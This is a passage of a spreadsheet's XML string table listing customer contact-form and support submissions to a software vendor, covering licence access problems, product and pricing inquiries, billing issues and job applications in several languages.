We are also looking for financial consultants and brokers with a qualified background that will work with us as our agents and representatives. In case you are interested and have clients who need loan. kindly let us know._x000D_
_x000D_
Best wishes, _x000D_
_x000D_
Mr Ian Cullum _x000D_
Investment Manager</t>
  </si>
  <si>
    <t>Technical Support on Product Website Management version 16.0. We have are receiving "Unable to save template' error whenever we edit and save a template in Smartree</t>
  </si>
  <si>
    <t>My company has an account, however my access has not been established.</t>
  </si>
  <si>
    <t>Desjardins has advised us to switch companies.  Please cancel my account and stop billing thanks.</t>
  </si>
  <si>
    <t xml:space="preserve">Tried more than 3 times to enter password , no success . Please assist._x000D_
Thanks_x000D_
</t>
  </si>
  <si>
    <t>Looking to replace a legacy CRM which also doubles as a document repository. Interested in understanding what role your solutions could play in any future technology we choose to onboard.</t>
  </si>
  <si>
    <t>Exploring to procure open text software licenses</t>
  </si>
  <si>
    <t>Hi,_x000D_
_x000D_
It's urgently._x000D_
_x000D_
Could you do the same work regarding ticket 1-3463444243 for Trading Partner Name DKEUS?_x000D_
_x000D_
Thank you so much._x000D_
_x000D_
Regards,_x000D_
_x000D_
Quentin Benedetto</t>
  </si>
  <si>
    <t xml:space="preserve">We are a customer and after repeated requests to get the bill straightened out no one has contacted me. </t>
  </si>
  <si>
    <t xml:space="preserve">Dear Sir or Madam,_x000D_
_x000D_
Sprint is one of the biggest IT integrator's in Poland. For our customer we are looking for enterprise fax server solution._x000D_
Do you have solution for 5000 users accounts? Integration with Mittel PABX (via ISDN) and with Cisco Unified Communications Manager (via SIP)?_x000D_
_x000D_
Can you send datasheet and pricing?_x000D_
_x000D_
End customer - Police Headquarters Lublin Poland_x000D_
</t>
  </si>
  <si>
    <t>My name rs Edwin Escobar you should arrestedGuadalupe Martin's of doing. Fraud to your partners . She use other person to rip off people .lice in apt 4 515  north vanderhurst apt ppl t4 King City .she is a ex social worker from the government  and use many name as maria lopes Sandoval Martinez careno</t>
  </si>
  <si>
    <t xml:space="preserve">Access to My Support is denied. I can't download my license key for my EnCase. I got mail "License avaible on My Support" 8/12/2018. I have try confirm my account several times but that not solve the problem. </t>
  </si>
  <si>
    <t xml:space="preserve">Quote request for customer </t>
  </si>
  <si>
    <t>Guten Tag,_x000D_
_x000D_
wir wollen eine digitale Personalakte einführen._x000D_
Vor zwei Jahren hatten wir bereits OpenText angeschaut, die zuständige scheint nicht mehr im Haus zu sein. Wenn kann ich zu dem Thema ansprechen?_x000D_
_x000D_
Danke._x000D_
_x000D_
Freundliche Grüße_x000D_
Nicole Rauscher</t>
  </si>
  <si>
    <t>Hello,_x000D_
We are a group of researchers conducting research involving digital material with West Midlands Police, and would like to purchase an EnCase dongle device for connecting external hard drives to a laptop for use in our research project. Please would you be able to confirm the price of the device for purchasing?_x000D_
Many thanks,_x000D_
Juliane Kloess</t>
  </si>
  <si>
    <t>To help people</t>
  </si>
  <si>
    <t>To get rich</t>
  </si>
  <si>
    <t>Our organisation is undergoing a data and documentation review and the likely outcome is the need for the deployment of an enterprise content management solution with new policies and procedures. This will entail new systems, data ingestion, implementation of data classification and powerful and reliable search capabilities. _x000D_
We have a lot of existing content in Sharepoint and Dynamics which would potentially be in scope for ingestion / consolidation and search. _x000D_
_x000D_
We would also be looking for a complete on premise solution as we do not consider Cloud at this time._x000D_
_x000D_
I'm aware that you are Gartner leader in this field but I am unfamiliar with your solutions so could you contact me so we can discuss further please_x000D_
Many Thanks_x000D_
Tony</t>
  </si>
  <si>
    <t>for policy retention tool.</t>
  </si>
  <si>
    <t>Dear,_x000D_
I need a support access._x000D_
Before our company is working in EMC Documentum but from last 4 years we are not working._x000D_
But I want to continue with Documentum._x000D_
For this I need to acess support link._x000D_
Please grant me to access it._x000D_
Thanks in advance_x000D_
Regards_x000D_
Shahnawaz</t>
  </si>
  <si>
    <t>Hej,_x000D_
_x000D_
Vi har fått en inbetalning av er den 18/01 på 21464.50 SEK för faktura PJ11602816. Vi har redan bokat PJ11602816 mot en annan betalning från den 14/01 på 94443.80 SEK._x000D_
Ni har några förfallna fakturor med belopp på 21464.50 SEK (PJ11602817, PJ11602818, PJ11604121). _x000D_
_x000D_
Vänligen återkoppla så fort som möjligt om vi kan boka betalningen från den 18/01 mot en av ovanstående fakturor._x000D_
_x000D_
Tack på förhand!_x000D_
_x000D_
Christian Toth_x000D_
Accounts Receivable_x000D_
ManpowerGroup</t>
  </si>
  <si>
    <t>Server for trail</t>
  </si>
  <si>
    <t>TM</t>
  </si>
  <si>
    <t>We are currently using Exstream version 9.0 and older versions of Exstream for few applications.We would like to upgrade to Exstream version 16.4 for few applications and version 9.5 for few applications.We need your assistance to understand the process to receive the license key and the cost involved for upgraded version of keys.</t>
  </si>
  <si>
    <t>Cannot download renewed SMS license. Error message: "No Access_x000D_
We're sorry, your account does not grant you access to this resource."</t>
  </si>
  <si>
    <t>Hi, I have received the email confirmation that i have access to the MySupport, however when i try to access, it says that I didnt confirm(although i did)  and ask me to get the verification email again. I tried few times already and still no luck. Pelase advise.</t>
  </si>
  <si>
    <t xml:space="preserve">i have confirmed with mail, but when i logon the request termined:_x000D_
No Access_x000D_
_x000D_
We're sorry, your account does not grant you access to this resource._x000D_
</t>
  </si>
  <si>
    <t>Ok</t>
  </si>
  <si>
    <t xml:space="preserve">i cant access my support section to download my product as i receive a confirmation email </t>
  </si>
  <si>
    <t>I am able to login to my account on this portal. However when i try to go to my support, i get the following error: Content Server Error: Error logging in._x000D_
[Invalid username/password specified.]_x000D_
_x000D_
Please help to check. I wish to find out more on the system requirements for Documentum 16.4. Thanks.</t>
  </si>
  <si>
    <t>Can you provide me access to My Support? I need to research on some issues on SAP using VIM.</t>
  </si>
  <si>
    <t>To dady get job</t>
  </si>
  <si>
    <t>Issues with getting DP Templates to replicate/synchronize with SAP S4 HANA</t>
  </si>
  <si>
    <t>Currently TMiS using OpenText StreamServe 5.4.2, do we entitle for upgrade to the latest version, which is OpenText ExStream</t>
  </si>
  <si>
    <t>OUTSTANDING PAYMENT</t>
  </si>
  <si>
    <t>Payment</t>
  </si>
  <si>
    <t>Hello and good evening,_x000D_
_x000D_
While trying to apply to the Professional Services Operations Analyst role over the past few evenings, I have been unable to complete the application, as Google will not authorize the app._x000D_
_x000D_
I was hoping that you might be able to point me to the HR contact for this opportunity._x000D_
_x000D_
Thank you in advance for your help!_x000D_
_x000D_
Regards,_x000D_
Shaun Thomas</t>
  </si>
  <si>
    <t xml:space="preserve">We are searching contract information/document storage services for our startup pharma company. Need FDA/ICH compliant totally secure &amp; multiple backup platform. Total of 10 users, with perhaps 100-200 documents in 2019-2020. Platform to enable assembly of our first IND by Sept 2019. Price conscious. Please email me with your info needs for us to receive an initial quote. Want to decide by early February. Thanks -kevin   koneill@rhopharma.com </t>
  </si>
  <si>
    <t>Network licensing options for OpenText Brava! Desktop.  _x000D_
_x000D_
_x000D_
 Hi,_x000D_
_x000D_
Id like to know of an easier way to license and deploy Brava Desktop.  Is it possible to get a volume license key?  I see you offer a network version.  Can you tell me more about that?_x000D_
_x000D_
I see there is Open Text Brava! Enterprise, what is the difference between Enterprise and Desktop?</t>
  </si>
  <si>
    <t>Need pricing and info for AppX.</t>
  </si>
  <si>
    <t>Dear OpenText,_x000D_
_x000D_
By one of our my client requests i need to research different archiving options, compare their performance and evaluate their integration potential. The request is to run the OpenText Archive Server in AWS and perform various benchmarks related to large volume data transfers between the AS and AWS S3. Could you please suggest any trial or basic licensing options so that i could fulfill the request?_x000D_
_x000D_
Regards,_x000D_
Kostiantyn Khodykin</t>
  </si>
  <si>
    <t>Since we use the Captiva product, I wanted to inquire about the new EMC Captiva version that allows us to deploy to various environments. It would be great if it's possible to get some details about Jenkins integrations or any other new enhancements. Thanks.</t>
  </si>
  <si>
    <t xml:space="preserve">Hello, I am an independent contractor doing some research for a marketing company that is interested in a data management and reporting system.  This company partners with manufacturers/suppliers and works with major retailers to get their clients items in stores/on websites.  I was hoping to get more information in regards to what you offer, your pricing, and which retailers you are already integrated with. They would need data management to track their client information, client item information, retailer details, and customizable reporting that ties into various retailers POS systems to track sales, inventory etc. _x000D_
</t>
  </si>
  <si>
    <t>URGENT - FEDERAL GOVT PRICING/QUOTE REQUEST - DUE BY 1/24/2019.</t>
  </si>
  <si>
    <t>Not able to send a fax from fax2mail number 201-633-6116</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Help Grow Female Sport_x000D_
Hello OpenText,_x000D_
I’m reaching out to you on behalf of the Markham Thunder, a professional team in the Canadian Women’s Hockey League (CWHL). The Markham Thunder is home to Olympic, National Program, NCAA and USPORTS players. Last year was the team’s inaugural season in Markham after moving from Brampton. They won their first Clarkson Cup Championship (the Stanley Cup of women’s hockey) and are looking to build off that success with help from companies like yours._x000D_
 _x000D_
So why contact you?_x000D_
Women’s hockey let alone women’s sports is the largest growing sports market out there today. Most people have a daughter, niece, sister, granddaughter or friend that they hope can have equal opportunity as their male counter part, whether it be in sport or business. We have two home games left at our home arena in Thornhill that we really want to boost attendance and promote our sport and involvement in the community._x000D_
 _x000D_
Game 1: Saturday, January 26th at 7:30pm_x000D_
In partnership with You Can Play, an organization that supports equality, safety and respect in sport no matter your sexual orientation and/or gender identity._x000D_
Game 2: Sunday, February 17th at 12:30pm_x000D_
In support of DIFD (Do it For Daron), a foundation in support of youth mental health._x000D_
 _x000D_
We are looking to have companies or organizations purchase group tickets to attend our game as a fun work function while helping support the growth of women's hockey. Tickets start as low as $8, PLUS we are doing a BOGO promotion when a minimum of 10 tickets are purchased._x000D_
_x000D_
If you are interested in attending a game or learning more about our organization, let us know and we can chat more. _x000D_
 _x000D_
Thank you for your time,_x000D_
Turner McNaughton _x000D_
Markham Thunder, Sports and Marketing Intern_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>To no anything</t>
  </si>
  <si>
    <t>We have a number 919-792-1515 that is no longer working. Please advise.</t>
  </si>
  <si>
    <t>Discuss product features and schedule a product demo as we are looking at an Enterprise Content Management software solution.  Thank you.</t>
  </si>
  <si>
    <t>I'm trying to register Global360 Imaging For Windows and for whatever reason it's stuck using an old product key.  I've uninstalled, restarted, reinstalled and when I go to register the new product key not showing which doesn't allow me to register as the register.dat file is gone._x000D_
_x000D_
Any help would be greatly appreciated.</t>
  </si>
  <si>
    <t>Need help to locate dll file for HLLAPI support in Hummingbird Exceed.</t>
  </si>
  <si>
    <t>Hi Team,_x000D_
_x000D_
We are using Documentum 6.5 SP2 version. While trying to access files from Documentum through our Java application we are getting following error message,_x000D_
_x000D_
[1/18/19 13:43:20:631 CST] 00000147 SystemErr     R [DM_SESSION_E_RESTRICTED_ACCESS]error:  _x000D_
"The operation you attempted could not be completed because your user credentials are inadequate.  You are connected as user (***) with authentication level of (Change Password).  _x000D_
Ensure you connected successfully."_x000D_
_x000D_
Due to this we are unable to search/upload any documents from our application. _x000D_
_x000D_
Can you please help us in resetting the password or share us the steps for updating the password? It would be more helpful for us to fix the issue._x000D_
_x000D_
Thanks,_x000D_
Yogesh Jain</t>
  </si>
  <si>
    <t>We use the IRM SW for restricting access to our Discount Matrix and now all of a sudden employees are getting errors and now IT is telling me they are not supporting this.  I need to know how we get it back as this is needed for highly confidential info that I send internally.</t>
  </si>
  <si>
    <t>Looking to see if DocsOpen would be a great tool for policy review management.</t>
  </si>
  <si>
    <t xml:space="preserve">Hi,_x000D_
We recently bought Encase Forensics 8 but we only received a security dongle._x000D_
_x000D_
Can you please provide the URL to register the security dongle and download the installation files._x000D_
_x000D_
Thanks. </t>
  </si>
  <si>
    <t>Discuss OpenText for our clients</t>
  </si>
  <si>
    <t>Hello_x000D_
_x000D_
There used to be a product referred to as iHub. Is it still available? I am looking for a reporting server/portal that will integrate BIRT reports. Do you have product(s) that can achieve this? What are the prices for your software?_x000D_
_x000D_
thank you_x000D_
Tony</t>
  </si>
  <si>
    <t>Learnership</t>
  </si>
  <si>
    <t>Our parent company, Bachman Machine uses your services for a third party solution for EDI and I would like to discuss that options of PMC.  We have a customer using SAP who would like us to be automated with their EDI.</t>
  </si>
  <si>
    <t xml:space="preserve">Matt Titus and myself have received a couple of email messages concerning making payments.  We are afraid these may be phishing attempts from someone impersonating your company, as Matt says we do not normally get invoiced in this fashion.  Also, the messages say there is new bank information we need to send the payment to.  We would like to confirm that we are not being overly cautious and that these messages are truly fraudulent.  </t>
  </si>
  <si>
    <t>Account information and previous invoice (2018)</t>
  </si>
  <si>
    <t>Trying to find out how I access licenses for ApplicationXtender previously purchased from EMC?  Are those licenses accessible via your site now?  Thanks.</t>
  </si>
  <si>
    <t>Hello,_x000D_
We are currently looking to implement a document management solution for our Corporation. Could you please send us a list of features and pricing (we are looking initially at 100 users which would then need to be expanded to around 500)?_x000D_
Some of our requirements are:_x000D_
Electronic Document Management_x000D_
Document Workflow (for approvals)_x000D_
OCR of PDFs documents_x000D_
Automatic Document Classification (based on content)_x000D_
Integration with existing user database_x000D_
Forcing users to save to cloud/repository_x000D_
_x000D_
Looking forward to hearing from you._x000D_
Regards,_x000D_
Eduardo Valdez</t>
  </si>
  <si>
    <t>Please attach my account to our main hospital support contract.</t>
  </si>
  <si>
    <t>Would like some information about content analytics (Technical). Thanks</t>
  </si>
  <si>
    <t xml:space="preserve">Job  application _x000D_
</t>
  </si>
  <si>
    <t xml:space="preserve">Hello,_x000D_
_x000D_
My client is launching a DAM project in 2 weeks and would like to have a demonstration to get an idea about different solutions. Given the short timing we would like to arrange a demo call  for Thursday the 24th of January or Monday the 4th of February._x000D_
Do you think you can call me back quite quickly to confirm your availability to make this demo? It will no last longer than 45 minutes._x000D_
Thank you for your help,_x000D_
Regards,_x000D_
Stéphen Minot_x000D_
</t>
  </si>
  <si>
    <t xml:space="preserve">We are using Documentum 6.5 SP2 version. While trying to access files from Documentum through our Java application we are getting following error message,_x000D_
_x000D_
[1/18/19 13:43:20:631 CST] 00000147 SystemErr     R [DM_SESSION_E_RESTRICTED_ACCESS]error:  _x000D_
"The operation you attempted could not be completed because your user credentials are inadequate.  You are connected as user (***) with authentication level of (Change Password).  _x000D_
Ensure you connected successfully."_x000D_
_x000D_
Due to this we are unable to search/upload any documents from our application. _x000D_
_x000D_
Can you please help us in resetting the password or share us the steps for updating the password? It would be more helpful for us to fix the issue._x000D_
</t>
  </si>
  <si>
    <t>Hi - Look for get more information from the sales team._x000D_
_x000D_
Best,_x000D_
_x000D_
Phil</t>
  </si>
  <si>
    <t>I would like someone to contact me so I can discuss the OpenText Content Suite Platform, as we are looking for a new document management system for our company.</t>
  </si>
  <si>
    <t>Hi, Can you please confirm if OpenText Content Migrator for eDocs works with SharePoint Online? Thanks</t>
  </si>
  <si>
    <t>I recently received a new PC and all my 3270 connection profiles are missing.  I saved them on my network but cant seem to figure out how to get the Connection Central Desktop to have them?   I also have a customized keyboard 3270 mapping that I need to restore?  Can you tell me how to copy?</t>
  </si>
  <si>
    <t>Charge on my cc</t>
  </si>
  <si>
    <t>Hello - Our client SNC-Lavalin has an account with opentext 10132402, att of Andre Dehaney. Currently it's billing to SNC Lavalin O&amp;M INC &amp; they want it transferred to their parent company SNC-Lavalin INC. I'm in the process of creating a Purchase Order for the remainder of the contract (based on minimum commitment of $100/month).  However I need to know if there is a form or something that needs to be signed and provided to Open Text to change the legal name on the invoice. Please let me know.</t>
  </si>
  <si>
    <t>We can not find our copy of Gupta report writer 6.1 (team developer 6.1), we purchased it  at least 6 yrs ago.  How can I get another copy.  Thanks we need to archive an old database.</t>
  </si>
  <si>
    <t xml:space="preserve">We need a download link to the latest version of EnCase. Thanks! </t>
  </si>
  <si>
    <t>wir wollen die hinterlegte E-Mail-Adresse korrigieren, aber dies gestaltet sich bei Ihrer Hotline oder Ihrem Kunden-Service mehr als nur schwierig.._x000D_
_x000D_
Hierzu haben wir auch folgende Adresse angeschrieben:_x000D_
buchhaltung.eu@easylink.com _x000D_
_x000D_
Bitte um Kontaktaufnahme auf deutsch, danke</t>
  </si>
  <si>
    <t>Good day,_x000D_
_x000D_
Unable to install "Documentum IRM Client for PDF" on "Adobe Acrobat Reader DC 2019.010.20069" due to an error 1158 appearing straight after launching the "IRMClientForPDF.exe"_x000D_
_x000D_
Could you please on a solution._x000D_
Thank you.</t>
  </si>
  <si>
    <t>I have No Access to "MY support"</t>
  </si>
  <si>
    <t>Dear To Whom This May Concern,_x000D_
_x000D_
I am attempting to apply for a position at your company, however I come across this error which reads "There are people with this information" under email which won't let me progress further into the application process. I would like to know, what this error means and how we can correct this. Any information at all is much appreciated. Thank you</t>
  </si>
  <si>
    <t>I would like to get some more details on OPENTEXT for AP Vendor invoice recognition OCR. i would like to know system requirements of SAP version and some case studies._x000D_
_x000D_
thanks</t>
  </si>
  <si>
    <t>I need to speak with someone regarding charges on my business credit card.</t>
  </si>
  <si>
    <t>Need access to documents and manuals for EnCase Endpoint Investigator.  Plus I don't see any of the license information populated in my account.  What can I do to get these items added to my account?</t>
  </si>
  <si>
    <t>Prezados, bom dia!_x000D_
_x000D_
Preciso de contato da área comercial para uma conversa inicial e possibilidade de convite para contratação de solução ECM._x000D_
_x000D_
A empresa se localiza no Rio de Janeiro/Brasil._x000D_
_x000D_
Aguardo retorno, _x000D_
Marcio Victorino_x000D_
(021) 986648767</t>
  </si>
  <si>
    <t xml:space="preserve">I want to know if you have partners in Monterrey, N.L., I am looking for some training on GSX, EDI, Cordys, Java, XML, Webservices, etc,  </t>
  </si>
  <si>
    <t>Windows 10 question - Will Exceed 2008 x64 run on a Windows 10 system?</t>
  </si>
  <si>
    <t>Hello,_x000D_
AENOR belongs to the Spanish Standardisation Body  and we have a catalogue of +50.000 technicals standards, most of them European. We´d like to have a conversation to see if there is any way of collaborate with you to include this content in your solutions._x000D_
Kind regards,_x000D_
Jesús</t>
  </si>
  <si>
    <t>Good day,_x000D_
_x000D_
We have been running rightfax product for the past few years, but for the last 2 years we have not been getting software updates due to SUS subscription not being renewed._x000D_
_x000D_
Will you be able to assist in getting our subscription restarted to get the latest updates?_x000D_
_x000D_
Regards,</t>
  </si>
  <si>
    <t xml:space="preserve">Hi,_x000D_
_x000D_
We already have 2 licenses for Gupta Team Developer version 6.2 and we're now trying to upgrade to version 7.1._x000D_
_x000D_
We have downloaded TD7.1 installation files from your site, and installed the 30 days trial._x000D_
_x000D_
We are unable to updrage to "official" version 7.1. How should we do this?_x000D_
_x000D_
It seems that our PMCs for version 6.2 are not valid for version 7.1, and the PMC which was sent to us with the trial version, only installs the trial version, and there seems to be no way to upgrade it?_x000D_
_x000D_
I think our licenses for TD6.2 are for the "native" TD only; they do not include the dotNET functionality. Is there a "Team Developer without dotNET" installation package for version 7.1, or something similar?_x000D_
_x000D_
Thank you._x000D_
_x000D_
-- _x000D_
_x000D_
Jarkko Väisänen_x000D_
jarkko.vaisanen@procomp.fi_x000D_
Procomp Solutions_x000D_
Yrttipellontie 10_x000D_
90230 Oulu_x000D_
Finland_x000D_
</t>
  </si>
  <si>
    <t xml:space="preserve">We have 3 Brava reader licences. EAch licence appears to have to be associated with a IP address. One of our licences has stopped working and we need you to sort out the ip address details.These are the details _x000D_
MAC Address: 44-37-E6-76-9C-FF_x000D_
Asset Number: GFDW01030_x000D_
Please can you confirm that one of our Brava reader licences will work on this machine._x000D_
</t>
  </si>
  <si>
    <t>End of contract</t>
  </si>
  <si>
    <t>Hi, Just sending this email to check if it is possible to include my email in the distribution list so that I get notification for the new releases &amp; updates  made for the OpenText._x000D_
Thanks.</t>
  </si>
  <si>
    <t>I'm a fast learner</t>
  </si>
  <si>
    <t>Need steps to update Docbase password</t>
  </si>
  <si>
    <t>Hi, I have a user who is trying to import documents on eDocs 5.3.1 but the document name box is greyed out &amp; they can't rename anything - can you provide any assistance/documentation on any possible fixes for this issue</t>
  </si>
  <si>
    <t xml:space="preserve">Locked account please help unlock </t>
  </si>
  <si>
    <t>I would like to know the pricing for BI &amp; Analytics Software commercial version</t>
  </si>
  <si>
    <t>Where is the list of your certified partners in Middle East and Europe?</t>
  </si>
  <si>
    <t xml:space="preserve">Wishing to get pricing and further information for Qfinity, the ability to record calls, voice and screens, analytics and surveys. Also to see if this is compatible with our current set up. Small start up company based in England - Leeds </t>
  </si>
  <si>
    <t>to have a clear knowledge of trading and projects</t>
  </si>
  <si>
    <t>I cannot access support . i used to be able to do this . i have received the verification email and clicked the link to confirm email but i still not get into My Support. I keep getting the error verification needed and i go through the whole email process again</t>
  </si>
  <si>
    <t xml:space="preserve">Confirming that the course mentioned below is a 100% confirmed to happen on the mentioned dates so that travel arrangements can start. _x000D_
_x000D_
Mar 25, 2019  On-site  3-8011  English  Reading, UK - Open Text 3,180.00 _x000D_
</t>
  </si>
  <si>
    <t xml:space="preserve">Dear Support,  _x000D_
_x000D_
I am not having access to OpenText knowledge base.  Can you please check and me know, how to proceed further to get knowledge base access. </t>
  </si>
  <si>
    <t>I want to buy EnCase.</t>
  </si>
  <si>
    <t>STOP SENDING ME EMAILS!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!</t>
  </si>
  <si>
    <t xml:space="preserve">Sehr geehrte Damen und Herren,_x000D_
_x000D_
nach unserer weiteren Recherche im Internet sind wir auf Ihre Seite gestoßen und wollten Sie wegen Ihrer Software kontaktieren. Um unser Vorstellung/Erwartung zu der Software zu verstehen haben wir Ihnen nachfolgend unsere Wünsche aufgelistet:_x000D_
_x000D_
•	Zugang für 27 Personen _x000D_
_x000D_
•	Stichwort verschlagen für Pc und mobil für 27 Personen_x000D_
              mit eventuelle Vorschlagfunktion von bereits bekannten Stichwörtern _x000D_
_x000D_
•	Upload von Bildern über Pc und mobil für 27 Personen _x000D_
_x000D_
•	Download von Bildern über Pc und mobil für 27 Personen _x000D_
_x000D_
•	Download in ein bestimmtes Laufwerk über Pc und mobil für 27 Personen_x000D_
_x000D_
•	Drucken von Bildern über Pc und mobil für 27 Personen _x000D_
_x000D_
•	Beschreibungen sehen und hinzufügen an Bildern für Pc und mobil für 27 Personen _x000D_
_x000D_
•	Drucken mehrerer Bilder mit Beschreibung als Broschüre für Pc für 27 Personen _x000D_
_x000D_
•	AD-In Funktion der Software in PowerPoint, mit der Option Schneiden_x000D_
             (Drag and Drop ist unserem Fall nicht sinnvoll) _x000D_
_x000D_
•	Laufwerkedurchsuchung auf Server nach Bildern, Dateien _x000D_
             (Optional wäre auch eine Claude zur Erweiterung möglich. Wir haben jedoch aktuell 350 GB an Bildern, welche aufgrund der vielen Projekt exponentiell nach oben steigen.)_x000D_
_x000D_
_x000D_
Zum Verständnis unter mobil verstehen wir das Arbeiten über Handy, Tablett oder Laptop._x000D_
_x000D_
Das sind nun viele Punkte, aber das ist der Kern der für unsere Arbeit wichtig ist. Wir würden uns deshalb über eine Rückmeldung von Ihnen für eine Demo-Vorstellung freuen._x000D_
</t>
  </si>
  <si>
    <t>Hi,_x000D_
_x000D_
Recently been having issues with our custom EnScripts not being configured. This may have been affected when a privileged access management team made some recent changes. Hoping to talk with Jeremy F or someone with knowledge of our EnScripts to try and resolve this. _x000D_
_x000D_
Thanks.</t>
  </si>
  <si>
    <t>Hi,_x000D_
_x000D_
I just ordered a Training via your Web Site. I realized the my Outofill Option for the Email adress wasn't correct. Please use the Address:_x000D_
_x000D_
Michael.Nohl@KLdiscovery.com_x000D_
_x000D_
for confirmation and Paying instructions,</t>
  </si>
  <si>
    <t xml:space="preserve">Dear,_x000D_
_x000D_
We are software selling company from Poland. We have 25 years experience in selling computer software on polish market._x000D_
 _x000D_
My customer is interesting in purchase order on 1 x OpenText Gupta Team Developer 7.0._x000D_
 _x000D_
What will be dealer's price and how can I buy for him?_x000D_
 _x000D_
We will pay by credit card._x000D_
_x000D_
_x000D_
Best Regards_x000D_
_x000D_
Adam Mekal_x000D_
_x000D_
TTS Company Sp. z o.o._x000D_
</t>
  </si>
  <si>
    <t xml:space="preserve">queries regarding xpression to exstream migration </t>
  </si>
  <si>
    <t>français/ test</t>
  </si>
  <si>
    <t>Wanted to understand solution pricing of OpenText for India.</t>
  </si>
  <si>
    <t xml:space="preserve">Can you please let us know the difference between Exceed TurboX ( ETX ) Standard and Premium editions  ? </t>
  </si>
  <si>
    <t>Sehr geehrte Damen und Herren,_x000D_
_x000D_
als Mitarbeiter des Bundesamts für Justiz (öffentliche Verwaltung) bin ich unter anderem für die Ausschreibung von IT-Leistungen zuständig. _x000D_
_x000D_
Aktuell verfügt das Bundesamt für Justiz insgesamt über 1.048 1.048 DOMEA®-Lizenzen:_x000D_
_x000D_
DOMEA® Windesk;	259_x000D_
DOMEA® Volltext Oracle IMT-Link;	259_x000D_
DOMEA® Multiformat-Viewer	259_x000D_
DOMEA® Zonen-OCR	259_x000D_
DOMEA® Admin	7_x000D_
DOMEA® KoFax-AC-Link	4_x000D_
DOMEA® Move	1_x000D_
_x000D_
Die Pflege der Lizenzen läuft zum 31.03.2020 aus. Im Rahmen der Ausschreibung soll die Pflege der Lizenzen verlängert werden._x000D_
_x000D_
Um eine ordnungsgemäße Ausschreibung durchführen zu können, benötige ich folgende Informationen:_x000D_
_x000D_
1.) Wie lange kann ein Support und eine Pflege der DOMEA®-Lizenzen garantiert werden? Die Beantwortung der Frage ist wichtig, um hier eine konkrete Vertragsdauer festzulegen. Angestrebt wird hier ein Vertrag über fünf bzw. sechs Jahre._x000D_
_x000D_
2.) Es wird um Übermittlung einer unverbindlichen aktuellen Preisinformation gebeten. Diese benötige ich hier, um den Auftragswert für die Ausschreibung zu schätzen._x000D_
_x000D_
Es wird um schriftliche Antwort und Übermittlung der Antwort an meine behördliche E-Mail-Adresse gebeten. _x000D_
_x000D_
Für Ihre Bemühungen und Hilfe bedanke ich mich im Voraus. _x000D_
_x000D_
Mit freundlichen Grüßen_x000D_
Im Auftrag_x000D_
_x000D_
Christoph Drüing</t>
  </si>
  <si>
    <t>to create an account to login into vista plus</t>
  </si>
  <si>
    <t xml:space="preserve">Hello, This is Hyehyun Lee from FRONTEO Korea which was UBIC Inc,._x000D_
_x000D_
I’d like to request you to get quote regarding Encase SMS renewal thing._x000D_
We have 5 dongles and contracted 3 years SMS renewal last time._x000D_
Please send us 3 years SMS renewal quote if you can provide directly._x000D_
We’d like to know whether we can contract Guidance directly or not._x000D_
_x000D_
Please refer to P/N below._x000D_
_x000D_
G2002024838_x000D_
G2002061372_x000D_
G2002024840_x000D_
G2002024841_x000D_
G2002024845_x000D_
</t>
  </si>
  <si>
    <t>Isnjsbsd</t>
  </si>
  <si>
    <t>QA Testing and Please ignore.</t>
  </si>
  <si>
    <t xml:space="preserve">Senior prorgam manager vacancy_x000D_
</t>
  </si>
  <si>
    <t xml:space="preserve">Hi_x000D_
I am Cecilia Tsai, Cloud solution product manager, from cloud business department of Bestcom Infotech Corp, Taipei Taiwan._x000D_
We are looking for new cloud solution for our customer and really interested in your product._x000D_
Hope there is more cooperation opportunity in the Future._x000D_
 _x000D_
Bestcom established in 1987 and set up individual cloud business department in 2018 for providing profession cloud solution. We are the first distributor of cloud solution provider for Microsoft, and performance well in cloud product. We set marketplace for cloud product and wish acting “the best cloud solution in Bestcloud”._x000D_
We not only provide efficient mechanism and complete commercial access for channel, but also set a professional technical team to support. There is an education center for our channel partner for more training and service. _x000D_
 _x000D_
Now we focus on four different scope solution:_x000D_
Data protection_x000D_
Security_x000D_
Smart workplace _x000D_
Business essential_x000D_
 _x000D_
We are very pleased to contact with you, and we hope to hear your reply from email or phone._x000D_
 _x000D_
Best regard _x000D_
Thank you_x000D_
 _x000D_
蔡孟芹Cecilia_x000D_
雲端事業部_x000D_
群環科技 Bestcom Infotech Corp._x000D_
Tel：(02)2557-0808#1271_x000D_
Mail：cecilia0978@bestcom.com.tw_x000D_
台北市大同區 重慶北路二段243號14樓_x000D_
</t>
  </si>
  <si>
    <t>Assistance creating reports for fax lines. Such as faxes received by a certain fax number. Tried available reports, but not seeing one for incoming faxes to a specific fax number.</t>
  </si>
  <si>
    <t>Interested to know if you have a solution for indexing multiple Windows File Shares (CIFS Shares) and running scans against the shares for variable length strings (Credit Card, SSN numbers, etc.) and moving them to another share or deleting them?</t>
  </si>
  <si>
    <t>Looking for simple OCR software for AP processing that is compatible with SAP.</t>
  </si>
  <si>
    <t>Cancel our Account</t>
  </si>
  <si>
    <t>We are upgrading our computer that has the Trusted link EDI software on it and my IT guy says he needs to know what particulars Trusted link needs to run. Can someone please email me the details. Thank you.</t>
  </si>
  <si>
    <t>Universal Webflow has a services contract with OpenText Professional Services for the United States. We are requesting information please on the correct contact details (phone and email if possible) for the Professional Services manager(s) that we should contact in the Content Suite and SAP Platform areas. The main purpose would be to understand any open requirements that could be shared with us and to submit consultant resumes where applicable._x000D_
_x000D_
Thank you,_x000D_
_x000D_
Mark Huffman</t>
  </si>
  <si>
    <t>Created account to contact support but get the message do not have access to support. Process Suite, Customer ID 10035651, Entitlement Group: EU0008507, Support Contract #: 0012225446. _x000D_
Content Server:Contract Number: A188505, EU0313237</t>
  </si>
  <si>
    <t>To communicate</t>
  </si>
  <si>
    <t>Design</t>
  </si>
  <si>
    <t>Please send information about exhibiting at Enfuse this year._x000D_
Thank you</t>
  </si>
  <si>
    <t>We need to have something done with our account. After a month, we have yet to hear back from anyone on how to get the account information for payments updated.  When we attempted to do it online we kept getting errors.  Now the previous account has been billed and completely messed up the reconciliation of a firm that was closed on 12-31-18.  Can someone please contact me so we can get this issue taken care of?  Thank you.</t>
  </si>
  <si>
    <t>Good afternoon_x000D_
Looking to get the requirement specs for version 16.2.  We are currently on version 10.6.  In searching for information I did find something but it stated Version 16 Pack 2 and didn't if this was the correct one or not._x000D_
_x000D_
Thank you_x000D_
Ray</t>
  </si>
  <si>
    <t>Hi,_x000D_
_x000D_
